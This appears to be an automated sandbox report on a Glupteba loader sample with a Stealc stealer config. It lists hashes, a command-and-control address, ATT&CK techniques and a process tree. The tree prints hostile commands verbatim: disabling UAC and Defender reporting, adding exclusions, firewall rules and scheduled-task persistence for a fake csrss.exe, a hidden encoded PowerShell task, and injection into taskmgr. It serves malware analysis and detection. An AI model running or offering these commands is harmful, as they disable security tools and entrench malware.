glupteba | 15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5

Analysis

max time kernel
1s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
16/01/2024, 16:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

5.0MB
MD5

2b2eab865b6f06cba30a1c8d51ba2232
SHA1

592e2f8e1d6d72e66e8b164b5039f966e105f6dd
SHA256

15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5
SHA512

3090d14ebade60f15b30f87d62c16352079a87658c77519c385de7bb3fa3f52ade688345a0c09e5501f4e3828752db53fcb51fdb948bf28fc130990a75ee3dcc
SSDEEP

49152:X57qFK3V68ujeUKdHLgRJkkHnrkHhmvuFuvsqH77z1skzWQrzBwtmar58cJMfX92:Qfw0b1ByQr4SxP0

Score

10^/10

glupteba stealc dropper evasion loader stealer trojan upx

Malware Config

Extracted

Family

stealc

http://185.172.128.79

Attributes

url_path
/3886d2276f6914c4.php

rc4.plain

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 14 IoCs

resource	yara_rule
behavioral2/memory/1940-100-0x0000000002EF0000-0x00000000037DB000-memory.dmp	family_glupteba
behavioral2/memory/1940-108-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/2668-117-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/1940-205-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/1940-181-0x0000000002EF0000-0x00000000037DB000-memory.dmp	family_glupteba
behavioral2/memory/2668-248-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/2668-276-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/1940-338-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/4700-381-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/5840-606-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/4700-616-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/5840-681-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/5720-774-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/5720-823-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

Downloads MZ/PE file

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
5804	netsh.exe
6048	netsh.exe

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000600000002320f-228.dat	upx
behavioral2/files/0x000600000002320f-234.dat	upx
behavioral2/files/0x000600000002320f-240.dat	upx
behavioral2/files/0x000600000002320f-247.dat	upx
behavioral2/files/0x000600000002321e-252.dat	upx
behavioral2/memory/3700-259-0x00000000002A0000-0x0000000000788000-memory.dmp	upx
behavioral2/files/0x000600000002320f-263.dat	upx
behavioral2/files/0x000600000002320f-268.dat	upx
behavioral2/memory/3700-254-0x00000000002A0000-0x0000000000788000-memory.dmp	upx
behavioral2/memory/2556-242-0x0000000000ED0000-0x00000000013B8000-memory.dmp	upx
behavioral2/memory/3252-236-0x0000000000ED0000-0x00000000013B8000-memory.dmp	upx
behavioral2/memory/2556-380-0x0000000000ED0000-0x00000000013B8000-memory.dmp	upx
behavioral2/memory/3284-382-0x0000000000ED0000-0x00000000013B8000-memory.dmp	upx
behavioral2/memory/2204-809-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/files/0x000b000000016931-807.dat	upx
behavioral2/memory/5728-851-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 924 set thread context of 4836	924	file.exe	92

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5396	sc.exe

Program crash 3 IoCs

pid	pid_target	Process	procid_target
4704	2668	WerFault.exe	102
5912	1940	WerFault.exe	98
5924	1984	WerFault.exe	126

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral2/files/0x0008000000023297-835.dat	nsis_installer_1
behavioral2/files/0x0008000000023297-835.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 14 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5060	schtasks.exe
4276	schtasks.exe
2100	schtasks.exe
3680	schtasks.exe
5852	schtasks.exe
2004	schtasks.exe
5936	schtasks.exe
4740	schtasks.exe
996	schtasks.exe
2424	schtasks.exe
5440	schtasks.exe
4448	schtasks.exe
1440	schtasks.exe
6124	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5604	timeout.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
924	file.exe
1492	powershell.exe
1492	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	924	file.exe
Token: SeDebugPrivilege	1492	powershell.exe
Token: SeDebugPrivilege	4836	jsc.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 924 wrote to memory of 1492	924	file.exe	87
PID 924 wrote to memory of 1492	924	file.exe	87
PID 924 wrote to memory of 4836	924	file.exe	92
PID 924 wrote to memory of 4836	924	file.exe	92
PID 924 wrote to memory of 4836	924	file.exe	92
PID 924 wrote to memory of 4836	924	file.exe	92
PID 924 wrote to memory of 4836	924	file.exe	92
PID 924 wrote to memory of 4836	924	file.exe	92
PID 924 wrote to memory of 4836	924	file.exe	92
PID 924 wrote to memory of 4836	924	file.exe	92

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1492
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4836
- - C:\Users\Admin\Pictures\M2dAoNIJauDjFDEiEnkkZWdz.exe
    "C:\Users\Admin\Pictures\M2dAoNIJauDjFDEiEnkkZWdz.exe"
    3⤵
    PID:2736
- - C:\Users\Admin\Pictures\4GqysW1ldYopl9fbkyQOiKa4.exe
    "C:\Users\Admin\Pictures\4GqysW1ldYopl9fbkyQOiKa4.exe"
    3⤵
    PID:1940
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:2704
  - - C:\Users\Admin\Pictures\4GqysW1ldYopl9fbkyQOiKa4.exe
      "C:\Users\Admin\Pictures\4GqysW1ldYopl9fbkyQOiKa4.exe"
      4⤵
      PID:5840
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:6052
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:5944
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:6048
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:3028
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5784
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 832
      4⤵
      Program crash
      PID:5912
- - C:\Users\Admin\Pictures\3Oysybmm48istKgwWwQCmVXO.exe
    "C:\Users\Admin\Pictures\3Oysybmm48istKgwWwQCmVXO.exe"
    3⤵
    PID:184
  - - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      4⤵
      PID:748
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
        5⤵
        
        PID:1320
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        6⤵
        
        PID:4928
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        6⤵
        Creates scheduled task(s)
        
        PID:996
  - - C:\Users\Admin\AppData\Local\Temp\nse5074.tmp
      C:\Users\Admin\AppData\Local\Temp\nse5074.tmp
      4⤵
      PID:1984
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 3412
        5⤵
        Program crash
        
        PID:5924
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nse5074.tmp" & del "C:\ProgramData\*.dll"" & exit
        5⤵
        
        PID:5788
- - C:\Users\Admin\Pictures\b06hyNi6l8z3JwyMTKd2aUSe.exe
    "C:\Users\Admin\Pictures\b06hyNi6l8z3JwyMTKd2aUSe.exe"
    3⤵
    PID:2668
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:2816
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 892
      4⤵
      Program crash
      PID:4704
  - - C:\Users\Admin\Pictures\b06hyNi6l8z3JwyMTKd2aUSe.exe
      "C:\Users\Admin\Pictures\b06hyNi6l8z3JwyMTKd2aUSe.exe"
      4⤵
      PID:4700
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:5752
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4704
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:2264
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        
        PID:5720
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:5356
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:3064
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:5980
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:5852
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:5512
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        
        PID:5916
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:2424
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        
        PID:2204
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:5672
- - C:\Users\Admin\Pictures\oGqYWM9fD7MhJvCRjHuxu0zj.exe
    "C:\Users\Admin\Pictures\oGqYWM9fD7MhJvCRjHuxu0zj.exe" --silent --allusers=0
    3⤵
    PID:3252
  - - C:\Users\Admin\Pictures\oGqYWM9fD7MhJvCRjHuxu0zj.exe
      C:\Users\Admin\Pictures\oGqYWM9fD7MhJvCRjHuxu0zj.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2cc,0x2fc,0x6f079530,0x6f07953c,0x6f079548
      4⤵
      PID:2556
  - - C:\Users\Admin\Pictures\oGqYWM9fD7MhJvCRjHuxu0zj.exe
      "C:\Users\Admin\Pictures\oGqYWM9fD7MhJvCRjHuxu0zj.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3252 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240116163543" --session-guid=b3c36be4-d9a9-4e63-939b-e48c040f5203 --server-tracking-blob=ODhlN2U5YWE2ZjRiMzUzNWUxZTc1ZjE0M2I0YzJmODFjMmU1ZjBmOTA4NzQxMDE0MzQ4ZTFjMGRmZDcxOWY0ODp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNTQyMjkzNy41MTc3IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJlZjllNWEyOC04NmMyLTQ0OTUtODMyYS1hYmNmYzVmNTQ5MTUifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1C05000000000000
      4⤵
      PID:3284
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\oGqYWM9fD7MhJvCRjHuxu0zj.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\oGqYWM9fD7MhJvCRjHuxu0zj.exe" --version
      4⤵
      PID:3700
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161635431\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161635431\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
      4⤵
      PID:5776
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161635431\assistant\assistant_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161635431\assistant\assistant_installer.exe" --version
      4⤵
      PID:4900
- - C:\Users\Admin\Pictures\6GMKlb98nzXCeOftMLqd4hEZ.exe
    "C:\Users\Admin\Pictures\6GMKlb98nzXCeOftMLqd4hEZ.exe"
    3⤵
    PID:5588
  - - C:\Users\Admin\AppData\Local\Temp\7zS9E82.tmp\Install.exe
      .\Install.exe
      4⤵
      PID:3248
    - - C:\Users\Admin\AppData\Local\Temp\7zSA066.tmp\Install.exe
        
        .\Install.exe /gdidwDXwn "385118" /S
        5⤵
        
        PID:5400
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        6⤵
        
        PID:1360
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        6⤵
        
        PID:5900
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gpmxPJuMh"
        6⤵
        
        PID:4460
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gpmxPJuMh" /SC once /ST 04:07:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        6⤵
        Creates scheduled task(s)
        
        PID:2004
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bgKZxxDIOpRGITjYTe" /SC once /ST 16:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\VUPZyRQ.exe\" Ik /SYsite_idmQd 385118 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:5440
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gpmxPJuMh"
        6⤵
        
        PID:3168
- - C:\Users\Admin\Pictures\90WThUkbB5GI7c59aCEkb8ZN.exe
    "C:\Users\Admin\Pictures\90WThUkbB5GI7c59aCEkb8ZN.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
    3⤵
    PID:1668
- - C:\Users\Admin\Pictures\KWXsw5ZCimm3BmOWNjGqxnUW.exe
    "C:\Users\Admin\Pictures\KWXsw5ZCimm3BmOWNjGqxnUW.exe"
    3⤵
    PID:1940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2668 -ip 2668
1⤵
PID:2540

C:\Users\Admin\Pictures\oGqYWM9fD7MhJvCRjHuxu0zj.exe
C:\Users\Admin\Pictures\oGqYWM9fD7MhJvCRjHuxu0zj.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x308,0x30c,0x310,0x2d8,0x314,0x6e489530,0x6e48953c,0x6e489548
1⤵
PID:5048

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
1⤵
PID:5388

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:5804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1940 -ip 1940
1⤵
PID:5872

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161635431\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161635431\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x242614,0x242620,0x24262c
1⤵
PID:4804

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
1⤵
PID:4672
- \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
  2⤵
  PID:5924
- \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
  2⤵
  PID:5060

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
1⤵
PID:5636

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
1⤵
PID:5520

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
1⤵
PID:6136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:2908
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:1172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5132

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2396

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:5728

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
1⤵
- Launches sc.exe
PID:5396

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
1⤵
- Delays execution with timeout.exe
PID:5604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1984 -ip 1984
1⤵
PID:1484

C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\VUPZyRQ.exe
C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\VUPZyRQ.exe Ik /SYsite_idmQd 385118 /S
1⤵
PID:2540
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" 